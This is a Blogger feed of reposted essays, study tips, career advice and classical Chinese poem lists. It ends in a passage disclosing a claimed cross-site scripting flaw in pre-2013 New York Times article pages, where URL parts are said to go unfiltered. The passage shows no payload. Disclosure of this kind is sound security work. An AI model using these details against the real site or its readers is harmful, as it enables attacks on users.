tag:blogger.com,1999:blog-8277968006600232042024-03-14T00:32:07.247-07:00Essaybeans - Record Everything in Youthessayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.comBlogger95125tag:blogger.com,1999:blog-827796800660023204.post-60459082537692079862015-11-20T04:25:00.000-08:002015-11-20T19:16:24.010-08:00五种有效的学习方法 - 方法比努力重要<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-nG4RqhLiHRA/Vk8P29XE_3I/AAAAAAAAAe0/xrX9HlaSBgg/s1600/study.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="265" src="http://3.bp.blogspot.com/-nG4RqhLiHRA/Vk8P29XE_3I/AAAAAAAAAe0/xrX9HlaSBgg/s400/study.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
1 目标学习法<br />
掌握目标学习法是美国心理学家布卢姆所倡导的。布卢姆认为只要有最佳的教学,给学生以足够的时间,多数学习者都能取得优良的学习成绩。<br />
教
学内容是由许多知识点构成,由点形成线,由线完成相对独立的知识体系,构成彼此联系的知识网。因此明确目标,就要在上新课时了解本课知识点在知识网中的
位置,在复习时着重从宏观中把握微观,注重知识点的联系。另外,要明确知识点的难易程度,应该掌握的层次要求,即识记、理解、应用、分析、综合、评价等不
同层次,最重要的就是明确学习重要目标,即知识重点。有了目标能增强我们学习的注意力与学习动机,即为了这目标我必须好好学习。<br />
可见,明确学习目标是目标学习法的先决条件。目标学习法的核心问题,是必须形成自我测验、自我矫正,自我补救的自我约束习惯。对应教学目标编制形成性检测题,对自己进行检测,并及时地反馈评价,及时矫正和补救。<br />
<br />
学
习目标与人生目标不同,它比较具体,可以在短时间内实现。它可以使我们比较容易地享受成功的欢乐。增加我们的信心。因此,目标学习法也是成功教育的主要
策略之一,同时,实现学习目标也是实现人生目标的开始,只有使大小、远近目标有机的结合,才会避免一些无效劳动的发生。<br />
<br />
<br />
2 问题学习法<br />
带着问题去看书,有利于集中注意力,目的明确,这既是有意学习的要求,也是发现学习的必要条件。心理学家把注意分为无意注意与有意注意两种。有意注意要求
预先有自觉的目的,必要时需经过意志努力,主动地对一定的事物发生注意。它表明人的心理活动的主体性和积极性。问题学习法就是强调有意注意有关解决问题的
信息,使学习有了明确的指向性,从而提高学习效率。<br />
<br />
问题学习法要求我们看书前,首先去看一下课文后的思考题,一边看书一边思考;同时,它还要求我们在预习时去寻找问题,以便在听课时在老师讲解该问题时集中注意力听讲;最后,在练习时努力地去解决一个个问题,不要被问题吓倒,解决问题的过程就是你进步的过程。<br />
<br />
<br />
3 矛盾学习法<br />
矛盾的观点是我们采用对比学习法的哲学依据因为我们要进行对比,首先要看对比双方是否具有相似、相近、或相对的属性,这就是可比性。对比法的最大优点在
于:(1)对比记忆可以减轻我们记忆负担,相同的时间内可识记更多的内容。(2)对比学习有利于区别易混淆的概念、原理,加深对知识的理解。(3)对比学
习要求我们把知识按不同的特点进行归类,形成容易检索的程序知识,有利于知识的再现与提取,也有利于知识的灵活运用。<br />
<br />
综观中学课本,可比
知识比比皆是,如政治内容中,权利与义务、民主与法制、物质与意识、和平与发展等等;如语文学习中,复句与单句、设问与反问、比喻与借
代、记叙与议论、实词与虚词等等;如数学学习中,小数与分数、指数与对数、奇函数与偶函数、平行与垂直等等;如化学学习中,金属与非金属、晶体与非晶体、
化合与分解、氧化与还原、酸与盐等等。对比学习法不仅可以用于同一学科内的学习,还可以进行跨学科比较,如学习政治可用语文中的句子分析法来分析政治概
念,如在学习近现代史中的民族解放运动时,又可以利用政治有关民族的基本观点,学习自然学时,可回忆一下有关语文课本中的有关科学家的传记文章,也可结合
唯物辩证法的有关原理进行学习。<br />
<br />
<br />
4 联系学习法<br />
唯物辩证法认为世界上任何事物都是同周围的事物存在着相互影响、相互制约的关系。科学知识是对客观事物的正确反映,因此,知识之间同样存在着普遍的联系,我们把联系的观点运用到学习当中,会有助于对科学知识的理解,会起到事半功倍的效果。<br />
<br />
根
据心理学迁移理论,知识的相似性有利于迁移的产生,迁移是一种联系的表现,而联系学习法的实质不能理解为仅仅只是一种迁移。迁移从某种意义上说是自发
的,而运用联系学习法的学习是自觉的,是发挥主观能动性的充分体现,它以坚信知识点必然存在联系为首要前提,从而有目的地去回忆、检索大脑中的信息,寻找
出它们间的内在联系。当然,原来对知识掌握的广度与深度直接影响到建立知识间联系的数量多少,但我们可以通过辩证思维,通过翻书、查阅、甚至是新的学习,
去构建新的知识联系,并使之贮存在我们的大脑之中,使知识网日益扩大。这一点是迁移所不能做到的。<br />
<br />
学习新知识就要想到旧知识,想到自己亲
身经历过的事,不能迷信权威,克服定势思维。把抽象的知识具体化,发挥右大脑的作用。如辛亥革命发生在1911年,
二次革命发生在1913年,护国战争发生在1915年,护法战争发生在1917年,这四个历史事件依次间隔二年,只要记住这两个历史事件的逻辑顺序,知道
其中任何一个事件的年代,就可以联想,推算出其它三个事件的年代。这是联想记忆法。<br />
<br />
读书之法,既先识得他外面一个皮壳,又须识得他里面骨髓方好。——朱熹<br />
<br />
<br />
5 归纳学习法<br />
所谓归纳学习法是通过归纳思维,形成对知识的特点、中心、性质的识记、理解与运用。当然,作为一种学习方法来说,归纳学习法崇尚归纳思维,但它不等同于归纳思维本身,同时它还要以分析为前提。<br />
<br />
可见,归纳学习法指的是要善于去归纳事物的特点、性质,把握句子、段落的精神实质,同时,以归纳为基础,搜索相同、相近、相反的知识,把它们放在一起进行识记与理解。其优点就在于能起到更快地记忆、理解作用。<br />
<br />
研究必须充分地占有材料,分析它的各种发展形式,探寻这些形式的内在联系。——马克思<br />
<br />
<br />
<br />
转载自Tetraph:<br />
<a data-mce-href="http://www.tetraph.com/blog/study/study-method/" href="http://www.tetraph.com/blog/study/study-method/">http://www.tetraph.com/blog/study/study-method/</a>essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-54322390717073173872015-11-20T03:11:00.000-08:002015-11-20T19:18:30.361-08:00心的回归 - 这一生,我们都走在回家的路上<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-4IdnJEv4hcg/Vk79vS88n2I/AAAAAAAAAeM/-U3ZV8SJVc0/s1600/cropped-road-home1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="http://1.bp.blogspot.com/-4IdnJEv4hcg/Vk79vS88n2I/AAAAAAAAAeM/-U3ZV8SJVc0/s400/cropped-road-home1.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
这一生,我们都走在回家的路上。<br />
<br />
<br />
回家,永远是我心中无法解开的情节。无论身在何处,我的心永远是朝着家的方向,它在一角默默的绽开,灯火阑珊处映射着家的绚丽。<br />
<br />
<br />
家,也将是一个多么令人心痛的字眼。离家之后才明白对家是多么的不舍,张开的翅膀听到它也会微微一颤,纵然身躯多么矫健,臂膀多么宽厚,在家的面前也将是脆弱无力。<br />
<br />
<br />
夜
深,烟花升,灯火明。多少人已经离开了家,多少人将要离开家,又有多少人想要回家。多少人在异地不经意的抬头,看见烟火绚烂的绽放,失落感油然而生,可
为了所谓的梦想,多少人无可奈何,百感交集。家里的灯火或许没那么美丽,烟花或许没那么灿烂,但是自己的内心仍能感受到家的体温,它像母亲的双手般温暖,
父亲的教导般纯朴,亲人的劝告般温馨。它流在你的血液里,扎根在你的骨髓中。它无时不刻不在提醒你,让心回家。<br />
<br />
<br />
公益回家的广告,煽动了我
们多少泪点,也唤醒了我久已沉睡的心。父母在,不远行。直到今天我才大彻大悟,这句话说了两千年,可有多少人才能明白它的真谛?
有多少人能按照它的旨意前行?起码我不是,以前不是。我不得不悔恨自己,悔恨当初。曾经一心想飞,想离家远远的,越远越好。抛开一切,逃避束缚,为了所谓
的梦想,可怜的父母,在所谓面前低人一等,而他们没有半句怨言,依然在静静的支持你,鼓励你。背后的辛酸与泪水你看不到,你看到的只是灯红酒绿,你看到的
只是金钱与权力,你看到的只是名声与羡慕!你眼里只有你所谓的成功,只有你的片刻的掌声与欢笑。你没有看到,父母的孤独与寂寞,他们什么都不需要,只要你
的陪伴与电话!他们只想要一个完整的你,一个健康快乐的你。有时候他们只是想见你一面,想听听你的声音,这你都不能满足,又怎能谈成功?<br />
<br />
<br />
我
欠他们的太多了,多的一辈子都无法弥补,这是一种罪,天大的罪,罄竹难书。我们太吝啬了,小气到在家就不曾说句感激的话,不曾多一些时间多陪一陪他们。
而我们呢,很忙,真的很忙。我们忙什么了?睡觉?玩电脑?玩手机?聚会?是啊,是挺忙的。我们给了他们多少时间?一日两餐吗?<br />
<br />
<br />
内疚是失败
者 的独白,但却是良心的谴责。当车票买到手的那刻,我知道我对父母的歉疚只能加深而不能弥补了。远行,我甚至有些反感了,多少次我扪心自问,按
照这样的走法,与父母的相处机会可是真的屈指可数了。相信很多远行者都是一年回家两次,按照这个算法,我们回家的次数还能过百吗?<br />
<br />
<br />
永远不会
忘记,我们是中国人,百善孝为先。如果我连最基本的都做不到,我就是一个一事无成的人,一个不完整的人。每次离家我都会躲避母亲的眼神,那是失
望,期望,坚定的汇总。仔细想想,我最基本的责任都没尽到,其他还有什么可谈。家,永远是我们梦境也是我们自己创造的,是我们大脑存在的凌乱的记忆碎片在
梦中被一种无形的力量加以整合与编造,使之存在短暂的真实感,并伴随着醒来渐渐消退。的港湾,心中没有家的人永远是一个失败者。<br />
<br />
<br />
无论多久,它总会在梦中出现,不论多远,我们不会停止奔跑的脚步,朝着家的方向。将来的将来,我不再迷茫,不再没有目的的追求,不走没有结果的旅程。家,永远是我的落脚点,让心回家,回到父母身边,弥补欠下的债。<br />
<br />
<br />
<br />
这一生,我们都走在回家的路上。<br />
<br />
<br />
<br />
<br />
<br />
<br />
转载自蝶比翼美文:<br />
<a data-mce-href="http://diebiyi.com/articles/essay/home-back/" href="http://diebiyi.com/articles/essay/home-back/">http://diebiyi.com/articles/essay/home-back/</a><br />
<br />
<br />essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-79362612353516140052015-10-19T03:32:00.000-07:002015-11-20T19:18:11.794-08:00Five Important Work Suggestion - Very Useful for Success<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-MOAn6MKpvK8/Vk8EtGjkJSI/AAAAAAAAAec/BEM_xU-N1ik/s1600/work.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="http://3.bp.blogspot.com/-MOAn6MKpvK8/Vk8EtGjkJSI/AAAAAAAAAec/BEM_xU-N1ik/s400/work.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This post is in partnership with Time. The article below was originally published at Time.com<br />
<br />
With
so much career advice floating around the interwebs, some of it is
bound to be poor. Luckily we here at Levo don’t just trust the
haphazardly doled-out opinions of self-appointed “leadership experts”
and other dubious characters. We go straight to the top—men and women
who have worked their way to massive career success — and ask them. What
strategies actually worked for them? Which career buzz phrases should
be ignored completely? Here are a few pieces of career advice that you
should never follow.<br />
<br />
1. “Always have a five-year plan.”<br />
Haven’t
you heard? Five-year plans are out, pivoting is in. Having tangible
goals is awesome and necessary, but trying to plan out the next five
years of your life is neither. The best opportunities are often those
that you don’t see coming. Being too stuck to your “five-year plan”
inhibits you from taking opportunities as they arise, and pivoting in
new directions.<br />
<br />
2. “Don’t be a job hopper.”<br />
There
are worse things to be. Namely, the quiet loyal workhorse who never
leaves or makes the money she deserves. It’s a new economy people, job
hopping is becoming the norm. These days, employees who stay in
companies for longer than two years earn 50% less over their lifetimes.
So yes, be gracious and respectful to each and every one of your
employers, but certainly don’t stay in a position for fear of being
labeled “a job hopper.”<br />
<br />
3. “Follow the money.” / “Just do what you love and the money will follow.”<br />
Equally
bad advice, from opposite ends of the spectrum. Following the money
with complete disregard for your interests is a surefire path toward a
soul-sucking career doing something you hate. It may not even be the
best financial move in the long term. On the other side of that coin,
doing what you love with the expectation that financial success will
miraculously follow is naive and ridiculous. As Kate White always says,
think about where your interests and talents intersect with the greatest
potential for financial success, and head toward those points of
intersection.<br />
<br />
4. “Don’t be too grabby. Let your work speak for itself.”<br />
This
is the kind of advice your Middle Eastern grandfather who owned a small
business 40 years ago might give you (not from personal experience or
anything). Even if it means well, it is just not true. Remember that
episode of New Girl? Jess wants to be vice principal of her school: “I’m
just hoping, you know in a few years, I’ll have enough experience that
Dr. Foster will consider me for Vice Principal.” Coach asks, “Why don’t
you just ask for it?” Jess says, “You can’t just ask for a promotion,
you know, you have to earn the promotion with years of hard work.” Coach
laughs. Please, don’t be Jess.<br />
<br />
5. “Don’t waste time applying to jobs you know you won’t get.”<br />
We
just published a great piece from the Personal Branding Blog that
addresses this very topic. Just because you think a particular job is a
reach or you’re not the ideal fit, that doesn’t mean you shouldn’t
apply. Within limits of course—don’t start applying for wedding
photographer assistant positions if you want to be a pharmacist (unless
you’ve always cultivated a secret passion for photography of course).
Every job you apply to is an opportunity to tighten up your resume, hone
your interview skills, and build confidence, which is never a waste of
time.<br />
<br />
<br />
Article From InZeed:<br />
<a data-mce-href="http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/" href="http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/">http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/</a>essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-56662075616081310602015-09-17T04:32:00.000-07:002015-09-17T04:32:00.488-07:00浮生半日 烟火红尘 一念清净 烈焰成池<wbr></wbr><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-NpwzlhThhBc/VeQ7RDQ4kcI/AAAAAAAAAdE/4e-QvZ_fnwI/s1600/BeautifulNature3-610x320_diebiyi.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="208" src="http://2.bp.blogspot.com/-NpwzlhThhBc/VeQ7RDQ4kcI/AAAAAAAAAdE/4e-QvZ_fnwI/s400/BeautifulNature3-610x320_diebiyi.jpg" width="400" /></a></div>
<div>
<br /></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
“半生漂泊,每一次雨打归舟”,浮生半日,烟火红尘,也说饮鸩不止渴,然终是一杯清茶洗过尘心,弦拨心上,山岚依如茶杯上的云烟。谁是谁别了三生三世的影,两吊钱赎回的旧梦遗风,谁还醉唱挽歌浅斟一盏薄情,清酒一壶就醉生梦死了时光。<br />
<br />
苦雪烹茶安然度过世界末日,许多人和事都重生了,我想我也会忘了那只乌鸦在末日的方舟上几番徘徊,飞过无痕,狮子却说爱我就让全世界都知道。爱是一
场荨麻
疹,容我再洗净铅华,待千帆过尽。这一别两宽心,各生新欢喜。太阳升起的时候,举目四方宿命繁星。如陈亦迅唱那首苦瓜:当你干杯再举箸,突然间相看莞尔,
某萧瑟晚秋深夜,忽而明了了,而黄叶便碎落。<br />
<br />
时间很短,天涯很远。自当终有弱水替三千。今宵请你多珍重,方配这半世流离醉笑三千场离散河两岸,江湖相忘。这杯烈酒下肚,碎一地离殇亦无需你刻意唱一曲骊歌摆渡,烟草的味道,风会把它稀释掉。<br />
<br />
麦田几次成熟容我焚香安静的难过,心怀感恩,祈福。<br />
<br />
诗经里说:一月气聚,二月水谷,三月驼云,四月裂帛,五月袷衣,六月莲灿,七月兰浆,八月诗禅,九月浮槎,十月女泽,十一月乘衣归,十二月风雪客。微雨突袭的三月桃花春柳拂面的桥头,可有良人云里衣衫?四月裂帛裂了思,陌上花谢了,可徐徐归么?<br />
<br />
孰说世间所有的相遇都是久别重逢,亦记得某年某月某日小北说:我可以留着你,也可以放任自由。<br />
<br />
<br />
<br />
<br />
期:浮世流光,惜物恋人。一念清净,烈焰成池。<br />
<br />
寸寸云文不成文,如果是伤了春悲了秋,写一路醉,哭一路歌,扯断心神,终亦忘却寒山。诗人,你如山的行囊里数<br />
<br />
不尽的人间烟柳可载得起这坛醉生梦死?<br />
<br />
烟水悠悠,淡酒一盏,十二月风雪客,同年同月同日刮着同个方向同样度数的风,都已不是当时。我想我是在待着一位故人,他还没有来,也许在来的路途上,我且沏好了茶,待着,如此 就好。<br />
<br />
<br />
<br />
<br />
<br />
转载自蝶比翼美文:<br />
<a href="http://diebiyi.com/articles/essay/shishi/">http://diebiyi.com/articles/essay/shishi/</a>essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-59077196815308762972015-08-31T04:01:00.000-07:002015-08-31T04:01:04.716-07:00Youth - Time of Beautiful Emotion<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-JDmiVuzGUH0/VeQx2tAod6I/AAAAAAAABVg/dTuO18YYP44/s1600/marguerite-729510_640_inzeed.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="260" src="http://2.bp.blogspot.com/-JDmiVuzGUH0/VeQx2tAod6I/AAAAAAAABVg/dTuO18YYP44/s400/marguerite-729510_640_inzeed.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Youth
is not a time of life; it is a state of mind; it is not a matter of
rosy cheeks, red lips and supple knees; it is a matter of the will, a
quality of the imagination, a vigor of the emotions; it is the freshness
of the deep springs of life.<br />
<br />
<br />
Youth means a
temperamental predominance of courage over timidity, of the appetite for
adventure over the love of ease. This often exists in a man of 60 more
than a boy of 20. Nobody grows old merely by a number of years. We grow
old by deserting our ideals.<br />
<br />
<br />
Years may wrinkle the
skin, but to give up enthusiasm wrinkles the soul. Worry, fear,
self-distrust bows the heart and turns the spirit back to dust.<br />
<br />
<br />
Whether
60 or 16, there is in every human being’s heart the lure of wonders,
the unfailing appetite for what’s next and the joy of the game of
living. In the center of your heart and my heart, there is a wireless
station; so long as it receives messages of beauty, hope, courage and
power from man and from the infinite, so long as you are young.<br />
<br />
<br />
When
your aerials are down, and your spirit is covered with snows of
cynicism and the ice of pessimism, then you’ve grown old, even at 20;
but as long as your aerials are up, to catch waves of optimism, there’s
hope you may die young at 80.<br />
<br />
<br />
<br />
From:<br /> <a data-mce-href="http://www.inzeed.com/kaleidoscope/life/youth/" href="http://www.inzeed.com/kaleidoscope/life/youth/">http://www.inzeed.com/kaleidoscope/life/youth/</a>essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-58072648848777202802015-07-13T01:46:00.000-07:002015-07-13T01:46:50.465-07:00关于山, 描写山的诗句 - 文中带山的经典古文<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-yGxUMEQsVwg/VaN6BxXNi-I/AAAAAAAAAZg/Pga9DntfZu0/s1600/7040469-lake-mountains-woods.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-yGxUMEQsVwg/VaN6BxXNi-I/AAAAAAAAAZg/Pga9DntfZu0/s400/7040469-lake-mountains-woods.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
1.千山鸟飞绝,万径人踪灭。<br /> (柳宗元:《江雪》)<br /> 2.白日依山尽,黄河入海流。<br /> (王之涣:《登鹳雀楼》)<br /> 3.会当凌绝顶,一览众山小。<br /> (杜甫:《望岳》)<br /> 4.国破山河在,城春草木深。<br /> (杜甫:《春望》)<br /> 5.空山不见人,但闻人语响。<br /> (王维:《鹿柴》)<br />
<br />
<br />
<br />
6.明月出天山,苍茫云海间。<br /> (李白:《关山月》)<br /> 7.相看两不厌,只有敬亭山。<br /> (李白《独坐敬亭山》)<br /> 8.种豆南山下,草盛豆苗稀。<br /> (陶渊明:《归园田居》)<br /> 9.西北望长安,可怜无数山。青山遮不住,毕竟东流去。<br /> (辛弃疾:《菩萨蛮?书江西造口壁》)<br /> 10.不识庐山真面目,只缘身在此山中。<br /> (苏轼:《题西林壁》)<br />
<br />
<br />
<br />
11.山光悦鸟性,潭影空人心。<br /> (常建:(题破山寺后禅院))<br /> 12.晚风拂柳笛声残,夕阳山外山。<br /> (李叔同:《送别》)<br /> 13.无限山河泪,谁言天地宽。<br /> (夏完淳:《别云间》)<br /> 14. 客路青山外,行舟绿水前。<br /> ( 王湾《次北故山下》)<br /> 15.飞来山上千寻塔,闻说鸡鸣见日升。<br /> ( 王安石《登飞来峰》)<br />
<br />
<br />
<br />
16.山重水复疑无路,柳暗花明又一村。<br /> (陆游:《游山西村》)<br /> 17.七八个星天外,两三点雨山前。<br /> (辛弃疾〈西江月?夜行黄沙道中〉)<br />
18.山回路转不见君,雪上空留马行处。<br /> (岑参《白雪歌送武判官归京》)<br /> 19.两岸猿声啼不住,轻舟已过万重山。<br /> (李白《早发白帝城》)<br /> 20.但使龙城飞将在,不教胡马度阴山。<br /> (王昌龄《出塞》)<br />
<br />
<br />
<br />
21.黄河远上白云间,一片孤城万仞山。<br /> (王之涣《凉州词》)<br /> 22.采菊东篱下,悠然见南山。<br /> (陶渊明:《饮酒》)<br /> 23.遥望洞庭山水色,白银盘里一青螺。<br /> (刘禹锡:《望洞庭》)<br /> 24.青海长云暗雪山,孤城遥望玉门关。<br /> (王昌龄《从军行》)<br /> 25.百川沸腾,山冢碎甭。高谷为岸,深谷为陵。<br /> (《诗经》)<br />
<br />
<br />
<br />
转载自 InZeed:<br /> <a data-mce-href="http://www.inzeed.com/kaleidoscope/essays/mountain/" href="http://www.inzeed.com/kaleidoscope/essays/mountain/">http://www.inzeed.com/kaleidoscope/essays/mountain/</a><br />
<br />
<br />
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-5432995742742068362015-07-13T01:22:00.000-07:002015-07-13T01:22:36.238-07:00有关于海的诗句 - 海纳百川 有容乃大<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Tw2gi2QU-CY/VaN0rDxyErI/AAAAAAAAAZQ/iV7xBMKaWHs/s1600/boat_sea_beach-normal.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-Tw2gi2QU-CY/VaN0rDxyErI/AAAAAAAAAZQ/iV7xBMKaWHs/s400/boat_sea_beach-normal.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
1,白日依山尽,黄河入海流。——王之涣《登鹳鹊楼》<br />
2,百川东到海,何时复西归?——乐府《长歌行》<br />
3,乘风破浪会有时,直挂云帆济沧海。——李白《行路难》<br />
4,春江潮水连海平,海上明月共潮生。——张若虚《春江花月夜》<br />
5,大漠孤烟直,长河落日圆。——王维《使至塞上》<br />
<br />
<br />
6,东临碣石,以观沧海。水何澹澹,山岛竦峙。——曹操《观沧海》<br />
7,浮天沧海远,去世法舟轻。——钱起《送僧归日本》<br />
8,俯首无齐鲁,东瞻海似杯。——李梦阳《泰山》<br />
9,海内存知己,天涯若比邻。——王勃《送杜少府之任蜀州》<br />
10,海日生残夜,江春入旧年。——王湾《次北固山下》<br />
<br />
<br />
11,海上升明月,天涯共此时。——张九龄《望月怀古》<br />
12,海水无风时,波涛安悠悠。——白居易《题海图屏风》<br />
13,瀚海阑干百丈冰,愁云惨淡万里凝。——岑参《白雪歌送武判官归京》<br />
14,君不见黄河之水天上来,奔流到海不复回。——李白《将进酒》<br />
15,君不见走马川行雪海边,平沙莽莽黄入天。——岑参《走马川行奉送封大夫出师西征》<br />
<br />
<br />
16,口衔山石细,心望海波平。——韩愈《精卫填海》<br />
17,楼观沧海日,门对浙江潮。——宋之问《灵隐寺 》<br />
18,茫茫东海波连天,天边大月光团圆。——黄遵宪《八月十五日夜太平洋舟中望月作歌》<br />
19,三万里河东入海,五千仞岳上摩天。——陆游《秋夜将晓出篱门迎凉有感》<br />
20,山水绕城春作涨,江涛入海夜通潮。——陈子澜《恩波桥诗》<br />
<br />
<br />
21,小舟从此逝,江海寄余生。——苏轼《临江仙》<br />
22,一雨纵横亘二洲,浪淘天地入东流。却余人物淘难尽,又挟风雷作远游。——梁启超《太平洋遇雨》<br />
23,月下飞天镜,云生结海楼。——李白《渡荆门送别》<br />
24,曾经沧海难为水,除却巫山不是云。——元稹《离思》<br />
25,煮海之民何所营,妇无蚕织夫无耕。衣食之源太寥落,牢盆煮就汝轮征。柳永《煮海歌》<br />
<br />
<br />
<br />
<br />
转载自 Tetraph:<br /> <a data-mce-href="http://www.tetraph.com/blog/articles/sea/" href="http://www.tetraph.com/blog/articles/sea/">http://www.tetraph.com/blog/articles/sea/</a><br />
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-79140235662526939772015-06-20T02:18:00.000-07:002015-06-20T02:18:17.420-07:00New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">The New York Times Old Articles Can Be Exploited by XSS Attacks (Almost all Article Pages Before 2013 Are Affected)</span></b></div>
<div>
</div>
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><br />
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"The New York Times (NYT) is an American daily newspaper, founded and continuously published in New York City since September 18, 1851, by the New York Times Company. It has won 114 Pulitzer Prizes, more than any other news organization. The paper's print version has the largest circulation of any metropolitan newspaper in the United States, and the second-largest circulation overall, behind The Wall Street Journal. It is ranked 39th in the world by circulation. Following industry trends, its weekday circulation has fallen to fewer than one million daily since 1990. Nicknamed for years as "The Gray Lady", The New York Times is long regarded within the industry as a national "newspaper of record". It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr., (whose family (Ochs-Sulzberger) has controlled the paper for five generations, since 1896), is both the paper's publisher and the company's chairman. Its international version, formerly the International Herald Tribune, is now called the International New York Times. The paper's motto, "All the News That's Fit to Print", appears in the upper left-hand corner of the front page." (Wikipedia)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) Vulnerability Description:</span></b><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;">The New York Times has a computer cyber security problem. Hacker can exploit its users by XSS bugs. </span></span><br />
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The code program flaw occurs at New York Times’s URLs. Nytimes (short for New York Times) uses part of the URLs to construct its pages. However, it seems that Nytimes does not filter the content used for the construction at all before 2013.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All pages of articles). In fact, all article pages that contain “PRINT” button, “SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Nytimes changed this mechanism since 2013. It decodes the URLs sent to its server. This makes the mechanism much safer now.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">However, all URLs before 2013 are still using the old mechanism. This means almost all article pages before 2013 are still vulnerable to XSS attacks. I guess the reason Nytimes does not filter URLs before is cost. It costs too much (money & human capital) to change the database of all posted articles before.</span><br />
